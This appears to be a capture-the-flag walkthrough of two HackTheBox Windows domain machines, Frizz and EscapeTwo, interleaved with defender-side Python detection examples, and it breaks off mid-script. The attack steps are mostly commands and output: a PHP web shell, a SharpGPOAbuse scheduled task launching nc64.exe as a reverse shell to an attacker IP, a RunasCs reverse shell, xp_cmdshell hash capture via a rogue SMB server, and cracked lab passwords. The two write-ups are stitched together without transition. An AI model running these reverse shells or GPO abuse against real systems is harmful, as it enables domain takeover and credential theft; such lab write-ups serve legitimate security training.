Anonymous LDAP lookup failed; a valid credential is needed.
croc@hacker$ ldapsearch -x -H ldap://frizzdc.frizz.htb -D '' -w '' -b 'DC=frizz,DC=htb'
# extended LDIF
#
# LDAPv3
# base <DC=frizz,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CB6, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1
SMB – 445/TCP
No luck with null authentication either. A STATUS_NOT_SUPPORTED error appears, indicating that the authentication mechanism being used is not supported.
croc@hacker$ nxc smb frizzdc.frizz.htb -u '' -p '' --shares
SMB         10.10.11.60     445    10.10.11.60      [*] x64 (name:10.10.11.60) (domain:10.10.11.60) (signing:True) (SMBv1:False)
SMB         10.10.11.60     445    10.10.11.60      [-] 10.10.11.60\: STATUS_NOT_SUPPORTED
SMB         10.10.11.60     445    10.10.11.60      [-] IndexError: list index out of range
SMB         10.10.11.60     445    10.10.11.60      [-] Error enumerating shares: Error occurs while reading from remote(104)
croc@hacker$ nxc smb frizzdc.frizz.htb -u 'guest' -p '' --shares
SMB         10.10.11.60     445    10.10.11.60      [*] x64 (name:10.10.11.60) (domain:10.10.11.60) (signing:True) (SMBv1:False)
SMB         10.10.11.60     445    10.10.11.60      [-] 10.10.11.60\guest: STATUS_NOT_SUPPORTED
💡 Think Box
From here, my next go-to is HTTP(80) where an Apache Web Server is running. I will start by checking out the functionality of the site and try to understand the business logic.
HTTP – 80/TCP
Main Page
The IP address of the box, 10.10.11.60, redirected to frizzdc.frizz.htb/home. This looks like a school website for the Walkerville Elementary School.
The following looks like base64-encoded text, which may be interesting.
ChatGPT decoded it for me and it says:
Want to learn hacking but don't want to go to jail? You'll learn the in's and outs of Syscalls and XSS from the safety of international waters and iron clad contracts from your customers, reviewed by Walkerville's finest attorneys.
Staff Login – Gibbon LMS
On the Staff Login page, I found that Gibbon LMS v25.0.00 is in use, an open-source learning management system designed for educational institutions.
Read the Notice carefully:
**NOTICE** Due to unplanned Pentesting by students, WES is migrating applications and tools to stronger security protocols. During this transition, Ms. Fiona Frizzle will be migrating Gibbon to utilize our Azure Active Directory SSO. Please note this might take 48 hours where your accounts will not be available. Please bear with us, and thank you for your patience. Anything that cannot utilize Azure AD will use the strongest available protocols such as Kerberos.
💡 Think Box
First, we have a name that might help us guess a username. Second, I suspect NTLM authentication is disabled on this machine. Third, knowing the exact Gibbon version allows us to search for relevant CVEs.
Forgot Password
On the Forgot Password page, we have username validation. Following is a failed attempt where the email address tried doesn’t exist.
On the other hand, trying out a bunch of different combinations for Ms. Fiona Frizzle, i.e. first initial + last name or firstname.lastname, I found a valid username of f.frizzle@frizz.htb:
Keep that intel in your back pocket for now… At this point, I have tested all the clickable areas of the website and understood the underlying functionality. Thus, we're done with the Happy Path Testing & it's time to move on to Unhappy Path Testing.
CVEs Enumeration – Gibbon v25.0.0
Initially, I looked for exploits for Gibbon v25.0.0 & found an LFI exploit, but that turned out to be a rabbit hole as I didn't find anything useful in the gibbon.sql file with it.
After that, I decided to look for vulnerabilities in higher versions and found two of them:
Using this PoC, I uploaded the payload <?php echo system($_GET['cmd'])?> to the file croc.php on the server. Below is the POST request and the response:
REQUEST:
Note that the base installation directory of Gibbon in our scenario is Gibbon-LMS as seen in the URL here.
According to the mysql configuration file in use here, it is utilizing the default port of 3306/tcp:
PS C:\xampp\htdocs\Gibbon-LMS> Get-Content C:\xampp\mysql\bin\my.ini
# Example MySQL config file for small systems.
#
# This is for a system with little memory (<= 64M) where MySQL is only used
# from time to time and it's important that the mysqld daemon
# doesn't use much resources.
#
# You can copy this file to
# C:/xampp/mysql/bin/my.cnf to set global options,
# mysql-data-dir/my.cnf to set server-specific options (in this
# installation this directory is C:/xampp/mysql/data) or
# ~/.my.cnf to set user-specific options.
#
# In this file, you can use all long options that a program supports.
# If you want to know which options a program supports, run the program
# with the "--help" option.

# The following options will be passed to all MySQL clients
[client]
# password = your_password
port=3306
socket="C:/xampp/mysql/mysql.sock"
....
We can indeed verify that mysql is actively listening for incoming connections on 3306:
Now, we can connect to the database using the credentials we already have:
croc@hacker$ mysql -h 127.0.0.1 -P 33061 -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' --skip-ssl
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 1219
Server version: 10.4.32-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
--skip-ssl is used to bypass encryption checks which were causing an error.
Shell as f.frizzle
Database Enumeration
I started by listing the databases and selected the gibbon database.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| gibbon             |
| information_schema |
| test               |
+--------------------+
3 rows in set (0.347 sec)

MariaDB [(none)]> use gibbon;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
After that, upon listing the tables, I was bombarded with 191 entries. That's exhausting, right? So, what I did instead was modify my SQL query to only return tables that have more than 0 rows. It's much better now!
Looking up on Google for tables where the personal information of users might be stored, I found a forum post stating that the gibbonPerson table is the one.
Fortunately, we have found a password hash along with a salt. The hash looks like SHA-256 based on its length (a 64-character hex string).
However, we also want to know the positioning of salt in the hash before trying to crack it. Upon searching on Google, I found that the hash processing is done in the core/preferencesPasswordProcess.php file, where core is Gibbon-LMS in our case.
Hence, the password for f.frizzle is Jenni_Luvs_Magic23.
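The hash format the write-up describes (a salt stored next to a 64-character hex digest) is easy to model, and doing so makes clear why a single salted SHA-256 is weak compared to a slow KDF. The following is an added example, not Gibbon's code and not from the write-up: it reproduces the length check, the salt-plus-password digest and a constant-time verification, then shows the same inputs under scrypt. The salt-first concatenation order is an assumption to confirm against the core/preferencesPasswordProcess.php file the text points to; all salts and passwords below are constructed demo values.

```python
import hashlib
import hmac
import os
import re

# Added example (not Gibbon's code): models the salted SHA-256 scheme the
# write-up describes and contrasts it with a slow KDF. The salt-first
# concatenation is an assumption to confirm in preferencesPasswordProcess.php.

HEX64 = re.compile(r"^[0-9a-f]{64}$")


def looks_like_sha256(value: str) -> bool:
    """The length-based guess from the write-up: 64 hex characters is SHA-256 sized."""
    return bool(HEX64.match(value.lower()))


def gibbon_hash(salt: str, password: str) -> str:
    """passwordStrong as stored in gibbonPerson: SHA-256 over salt || password (assumed order)."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def verify_gibbon(salt: str, stored_hash: str, candidate: str) -> bool:
    """Check one candidate against a stored hash; compare_digest avoids a timing side channel."""
    return hmac.compare_digest(gibbon_hash(salt, candidate), stored_hash.lower())


# Hardened form: same inputs, but scrypt makes every guess cost ~16 MiB of RAM
# and far more CPU than a single SHA-256 call, which is what slows offline cracking.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def scrypt_hash(salt: bytes, password: str) -> str:
    return hashlib.scrypt(password.encode("utf-8"), salt=salt,
                          n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32).hex()


def verify_scrypt(salt: bytes, stored_hex: str, candidate: str) -> bool:
    return hmac.compare_digest(scrypt_hash(salt, candidate), stored_hex)


if __name__ == "__main__":
    # Constructed demo values: not the salt, hash or password from the target database.
    demo_salt, demo_password = "kR7mQx2pLz9vBn4h", "Example_Pass23"
    stored = gibbon_hash(demo_salt, demo_password)
    print("stored hash :", stored, "(sha256-sized:", looks_like_sha256(stored), ")")
    print("right guess :", verify_gibbon(demo_salt, stored, demo_password))
    print("wrong guess :", verify_gibbon(demo_salt, stored, "Example_Pass24"))
    print("scrypt hash :", scrypt_hash(os.urandom(16), demo_password))
```

The salt only stops precomputed tables; it does nothing about per-guess cost, which is why one SHA-256 call per candidate cracks quickly while the scrypt variant with the same salt and password does not.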
🚀Way Forward
f.frizzle is part of the Remote Management Users group, but unfortunately WinRM is disabled on the box. So, for now, as we have a valid set of credentials, we can proceed to dump the BloodHound data and analyze potential pathways from there.
Bloodhound Collection
After getting hit by a dozen DNS errors, I finally succeeded in dumping the data. I also uploaded it into Bloodhound.
faketime is used in order to tackle the KRB_AP_ERR_SKEW error.
💡 Think Box
Enumerating all possible paths from f.frizzle, I found nothing that could lead us to further access. So, I went back to see what else we have and saw SSH open. As Kerberos authentication is a requirement, we need to do some configuration beforehand.
Setting up Kerberos Authentication
Step 01 – Install Client Libraries
If you are faced with any prompts during the installation, just remember to press the magic key “Enter” & go with the defaults.
I set up the environment variable KRB5_CONFIG to point to our custom Kerberos configuration file custom_krb5.conf located in our current directory ($PWD). This forces the Kerberos clients to use our custom realm configuration.
Moreover, I initiated an authentication request as f.frizzle to the KDC using kinit, which succeeded. As a result, we have a cached credential at /tmp/krb5cc_1001, which we can view using klist.
Revisiting BloodHound, I found that m.schoolbus is a member of the Desktop Admins group, which is in turn a member of the Group Policy Creator Owners group.
According to Microsoft,
"This group is authorized to create, edit, and delete Group Policy Objects in the domain. By default, the only member of the group is Administrator."
💡 Think Box
Hence, it’s a great time to enumerate GPOs on the target and see what we can get.
Transfer Powersploit
We will be using the Powersploit suite of tools for GPO enumeration.
git clone https://github.com/PowerShellMafia/PowerSploit
rm -rf PowerSploit/.git/   # Removed as it is not needed
zip -r PowerSploit.zip PowerSploit
python3 -m http.server 8000
Next, we downgrade to PowerShell v5 in order to make it work reliably:
PS C:\temp> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      7.4.5          # Before
PSEdition                      Core
GitCommitId                    7.4.5
OS                             Microsoft Windows 10.0.20348
Platform                       Win32NT
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0…}
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
WSManStackVersion              3.0

PS C:\temp> powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      5.1.20348.2849  # After
PSEdition                      Desktop
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   10.0.20348.2849
CLRVersion                     4.0.30319.42000
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
Since none of the existing GPOs are writable by our user m.schoolbus, we should explore creating a new GPO and linking it to a writable OU.
Looking for Writable OUs
We used the following command to enumerate writable OUs in our domain. Luckily, there exist only two OUs and both of them are writable by our current user.
Hence, we can link our new GPO to either of the two OUs: Domain Controllers or Class_Frizz. However, our target machine is in the Domain Controllers Organizational Unit, so it makes more sense to link to that.
PS C:\temp> & "C:\temp\SharpGPOAbuse.exe" --AddComputerTask --TaskName "EvilTask" --Author "FRIZZ.HTB\Administrator" --Command "cmd.exe" --Arguments "/c C:\Windows\Tasks\nc64.exe 10.10.14.182 443 -e powershell.exe" --GPOName "Evil Croc GPO" --Force
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] GUID of "Evil Croc GPO" is: {5C5DC385-1956-47B8-B432-376A3A580DBE}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{5C5DC385-1956-47B8-B432-376A3A580DBE}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
Successfully obtained a reverse shell as NT AUTHORITY\SYSTEM:
Way #02: Gaining Root – Adding a Local Admin
We can also make our user m.schoolbus a local admin on the DC and then initiate a reverse shell connection in his context to get admin privileges:
PS C:\temp> & "C:\temp\SharpGPOAbuse.exe" --AddLocalAdmin --UserAccount 'M.schoolbus' --GPOName "Evil Croc GPO" --force
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.schoolbus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "Evil Croc GPO" is: {48753DD8-2CF7-4859-8BA3-4056612363FD}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{48753DD8-2CF7-4859-8BA3-4056612363FD}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\temp> gpupdate.exe /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.
However, note that the members of the local admin group are not allowed to SSH into the machine:
PS C:\temp> cat C:\ProgramData\ssh\sshd_config
So, we need to figure another way out.
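Both GPO-abuse variants above leave a file in SYSVOL that SharpGPOAbuse names in its output: a Group Policy Preferences ScheduledTasks.xml for the immediate task, and a SecEdit GptTmpl.inf for the local-admin addition. A defender reviewing GPO changes can parse exactly those two artefacts. The following is an added example, not SharpGPOAbuse's code and not from the write-up; the two sample files are constructed to resemble those formats (the XML element layout is my assumption), and the only page-derived values are the task name, command line and the m.schoolbus SID.

```python
import configparser
import xml.etree.ElementTree as ET

# Added defender-side example, not SharpGPOAbuse or the write-up's code. It parses
# the two SYSVOL artefacts the tool reports writing (a GPP ScheduledTasks.xml and a
# SecEdit GptTmpl.inf) and flags what a GPO review should catch. Both samples below
# are constructed to resemble those files; the XML layout is my assumption.

INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
SYSTEM_ACCOUNTS = {"nt authority\\system", "system", "localsystem"}
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def suspicious_immediate_tasks(xml_text: str) -> list:
    """Immediate tasks run once at the next policy refresh and then vanish, so every
    ImmediateTaskV2 deserves a look; an interpreter running as SYSTEM is a red flag."""
    findings = []
    for task in ET.fromstring(xml_text).iter("ImmediateTaskV2"):
        props = task.find("Properties")
        if props is None:
            continue
        run_as = (props.get("runAs") or "").lower()
        for exe in props.iter("Exec"):
            command = (exe.findtext("Command") or "").strip()
            arguments = (exe.findtext("Arguments") or "").strip()
            binary = command.replace("/", "\\").rsplit("\\", 1)[-1].lower()
            reasons = ["immediate task"]
            if run_as in SYSTEM_ACCOUNTS:
                reasons.append("runs as SYSTEM")
            if binary in INTERPRETERS:
                reasons.append(f"launches {binary}")
            findings.append({"task": task.get("name"), "run_as": props.get("runAs"),
                             "command": command, "arguments": arguments, "reasons": reasons})
    return findings


def local_admin_additions(inf_text: str) -> list:
    """SIDs that a GptTmpl.inf [Group Membership] section adds to BUILTIN\\Administrators."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    cp.optionxform = str  # keep '*S-1-5-32-544__Members' keys exactly as written
    cp.read_string(inf_text)
    if not cp.has_section("Group Membership"):
        return []
    added = []
    for key, value in cp.items("Group Membership"):
        if key.strip() == f"*{BUILTIN_ADMINISTRATORS}__Members":
            added.extend(v.strip().lstrip("*") for v in value.split(",") if v.strip())
    return added


# Constructed sample modelled on the file SharpGPOAbuse reported creating.
SAMPLE_SCHEDULED_TASKS_XML = """\
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="EvilTask" image="0">
    <Properties action="C" name="EvilTask" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>FRIZZ.HTB\\Administrator</Author></RegistrationInfo>
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c C:\\Windows\\Tasks\\nc64.exe 10.10.14.182 443 -e powershell.exe</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Constructed sample of the SecEdit template the local-admin variant writes.
SAMPLE_GPTTMPL_INF = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-2386970044-1145388522-2932701813-1106
"""

if __name__ == "__main__":
    for f in suspicious_immediate_tasks(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"[!] {f['task']}: {f['command']} {f['arguments']} ({', '.join(f['reasons'])})")
    for sid in local_admin_additions(SAMPLE_GPTTMPL_INF):
        print(f"[!] GptTmpl.inf adds {sid} to BUILTIN\\Administrators")
```

Run over a SYSVOL export, the same two checks catch both variants at the point they are written, before the GPO refresh cycle ever executes them; a real GptTmpl.inf is UTF-16 on disk, so decode it before handing the text to the parser.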
💡 Think Box
What we can do is use RunasCs to execute commands as m.schoolbus and initiate a reverse shell connection through it, which will give us admin privileges.
RunasCS – Reverse Shell as admin
Set up a listener on your machine on whatever port and execute the following command on the target:
PS C:\temp> Import-Module .\Invoke-RunasCs.ps1
PS C:\temp> Invoke-RunasCs 'M.schoolbus' '!suBcig@MehTed!R' powershell.exe -Remote 10.10.14.182:5555
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2c55b3$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 740 created in background.
PS C:\temp>
And, we received a connection back as the local admin m.schoolbus:
croc@hacker:~$ sudo rlwrap nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.14.182] from (UNKNOWN) [10.10.11.60] 55947
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
frizz\m.schoolbus
PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
PS C:\Windows\system32>
As is common in real-life Windows pentests, we're given a set of credentials to start:
rose/KxEPkKe6R8su
nmap/TCP
nmap detected a bunch of ports being open which is typical for a Domain Controller:
croc@hacker$ rustscan -a 10.10.11.51 --ulimit 5000 -- -A -T5 -Pn -oA Initial
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.51:53
Open 10.10.11.51:88
Open 10.10.11.51:139
Open 10.10.11.51:135
Open 10.10.11.51:389
Open 10.10.11.51:464
Open 10.10.11.51:445
Open 10.10.11.51:593
Open 10.10.11.51:636
Open 10.10.11.51:1433
Open 10.10.11.51:3269
Open 10.10.11.51:3268
Open 10.10.11.51:5985
Open 10.10.11.51:9389
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -T5 -Pn -oA Initial -vvv -p 53,88,139,135,389,464,445,593,636,1433,3269,3268,5985,9389 10.10.11.51

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 05:28 EST
Nmap scan report for 10.10.11.51
Host is up, received user-set (0.43s latency).
Scanned at 2025-01-14 05:28:28 EST for 76s

PORT      STATE    SERVICE       REASON      VERSION
53/tcp    filtered domain        no-response
88/tcp    open     kerberos-sec  syn-ack     Microsoft Windows Kerberos (server time: 2025-01-14 10:28:44Z)
135/tcp   open     msrpc         syn-ack     Microsoft Windows RPC
139/tcp   open     netbios-ssn   syn-ack     Microsoft Windows netbios-ssn
389/tcp   open     ldap          syn-ack     Microsoft Windows Active Directory LDAP
|_ssl-date: 2025-01-14T10:38:18+00:00; +5s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
| SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
464/tcp   open     kpasswd5?     syn-ack
593/tcp   open     ncacn_http    syn-ack     Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      syn-ack     Microsoft Windows Active Directory LDAP
1433/tcp  open     ms-sql-s      syn-ack     Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.10.11.51:1433:
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info:
|   10.10.11.51:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-14T10:04:21
| Not valid after:  2055-01-14T10:04:21
| MD5:   476a:4f89:0d42:a766:8e26:4556:d99b:5ee2
| SHA-1: 6d9a:8222:9485:11e0:e510:7070:622a:b20c:de49:3318
|_ssl-date: 2025-01-14T10:29:43+00:00; +4s from scanner time.
3268/tcp  open     ldap          syn-ack     Microsoft Windows Active Directory LDAP
3269/tcp  open     ssl/ldap      syn-ack     Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
| SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
|_ssl-date: 2025-01-14T10:29:43+00:00; +5s from scanner time.
5985/tcp  open     http          syn-ack     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        syn-ack     .NET Message Framing
49665/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49666/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49667/tcp open     msrpc         syn-ack     Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 14 05:38:14 2025 -- 1 IP address (1 host up) scanned in 111.16 seconds
We can see DC01.sequel.htb from output of multiple ports, so let’s add that into the hosts file:
I dumped the .json files using the Python BloodHound Ingestor and fed that into bloodhound:
croc@hacker$ python3 -m bloodhound -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' -ns 10.10.11.51 -c all
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.sequel.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 03M 11S
croc@hacker:~/HTB/Escapetwo/bloodhound$ ls
20250113011955_computers.json   20250113011955_domains.json  20250113011955_groups.json  20250113011955_users.json
20250113011955_containers.json  20250113011955_gpos.json     20250113011955_ous.json
I found a pair of kerberoastable users in here so my next step would be to try kerberoasting. (Although that didn’t work out!)
Kerberoastable Users
Kerberoasting
Service Tickets
I got the service tickets for two accounts: sql_svc & ca_svc
I downloaded both files, which at first sight seem to be Excel files, but if we look at the file types they are actually .zip archives, so the standard unzip tool can extract the archive data.
We found the following credentials (refined form):

Username   Password
--------   ----------------
angela     0fwz7Q4mSpurIt99
oscar      86LxLBMgEWaKUnBG
kevin      Md9Wlq1E5bZnVDVo
sa         MSSQLP@ssw0rd!
Validating the Found Credentials
Note that the user sa was not found under the domain accounts we enumerated initially. What is sa by default?
The sa user in an Active Directory (AD) or Windows environment typically refers to the SQL Server System Administrator account. The SQL Server has two authentication modes:
Windows Authentication: Uses AD credentials.
SQL Server Authentication: Uses specific SQL accounts like sa.
That's why I didn't include sa in the validation via nxc, but I left its password in the passwords.txt file in case it is being reused.
So we only have one valid set of credentials, which is oscar's. However, he is a low-privileged user and didn't benefit me in any way. Now, what???
💡 Think Box
We have MSSQL open on port 1433/tcp, so we can attempt to gain a shell using impacket-mssqlclient as the sa user with its password of 'MSSQLP@ssw0rd!', which we found above.
Shell as sql_svc
MSSQL Authentication – 1433/tcp
impacket-mssqlclient
I gained shell access as the sa user:
croc@hacker$ impacket-mssqlclient sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (1507208)
[!] Press help for extra shell commands
SQL (sa  dbo@master)>
Now from here, I can think of two possibilities:
Capture a NetNTLMv2 hash and try to crack it. (Didn't work here!)
Reverse Shell
I will be doing both of them here.
Capturing a NetNTLMv2 Hash & Cracking it
Step#1: Set up a Rogue SMB Server
I set up an SMB server using impacket-smbserver on my Kali machine for the purpose of capturing the hash. Note that you can also use Responder on the tun0 interface to capture the hash.
I pointed the SQL Server to the SMB Server running on my Kali Machine:
SQL (sa  dbo@master)> enable_xp_cmdshell
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> xp_cmdshell dir \\10.10.16.32\supportmeonpatreon
output
--------------------------------------------------------------------------------
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
NULL
SQL (sa  dbo@master)>
You can also use xp_dirtree \\10.10.16.32\supportmeonpatreon in order to point the server to your machine. Both of these commands will get the service to try and access the folder at the UNC path in order to list its contents. It will authenticate to it giving out a hash.
However, xp_dirtree is quieter than xp_cmdshell dir.
3. However, that didn't crack, so let's move on to the second possibility.
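The "Configuration option 'xp_cmdshell' changed from 0 to 1" message shown above is not only printed back to the client; SQL Server also writes it to its ERRORLOG, which makes the xp_cmdshell route detectable after the fact. The following is an added detection example, not part of the write-up, that scans ERRORLOG text for sp_configure changes to the options that matter; the sample lines are constructed to match that message format, including the "1 to 1" re-run seen on this page.

```python
import re
from dataclasses import dataclass

# Added detection example, not from the write-up. It scans SQL Server ERRORLOG text
# for the sp_configure messages shown above. The sample lines are constructed to
# match that message format.

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

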